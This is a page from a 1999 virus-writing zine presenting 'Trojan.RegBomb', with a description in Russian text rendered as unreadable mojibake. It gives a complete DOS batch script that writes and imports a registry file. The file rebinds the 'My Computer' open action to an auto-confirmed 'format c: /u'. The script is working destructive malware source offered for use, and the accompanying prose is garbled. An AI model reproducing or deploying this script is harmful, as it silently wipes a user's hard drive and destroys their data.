- [Duke's Virus Labs #6] - [Page 18] -

Trojan.RegBomb
(c) by Duke/SMF

    : Trojan.RegBomb
         : Duke/SMF
 ண.   : DOS-script
 ᮧ : 26.03.99

    襬 ୠ 㦥 ᬠਢ ⥬ ᪨   ॥ Windows
(. DVL #4  22).  ⮬    頥  ⮩ ᭮
⥬.  । ᯮ짮 EXE-⠫஬  ⠭
,  ⥯   ४᭮ 㬥頥  쪮 BAT-䠩. ᫥
⠫樨 ⮩   ,  ࢮ   饫窥  
 " " 筥 ଠ஢ 襣 ᪠ C: (祬 
⠢   㣮  ᪠).  ਭ樯, 祣  ⮬ 譮 
     - 祭 ᪮ format ⪭   饭 
ࠧ塞   ४ ࠡ :((    ᠬ  㦨
 :)

===== Cut here =====
@ctty nul
set reg=c:\regbomb.reg
echo>%reg% REGEDIT4
echo.>>%reg%
echo>>%reg% [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Open]
echo.>>%reg%
echo>>%reg% [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Open\Command]
echo>>%reg% @="start /minimized command /c echo y|format c: /u >nul"
echo.>>%reg%
regedit.exe %reg%
===== Cut here =====
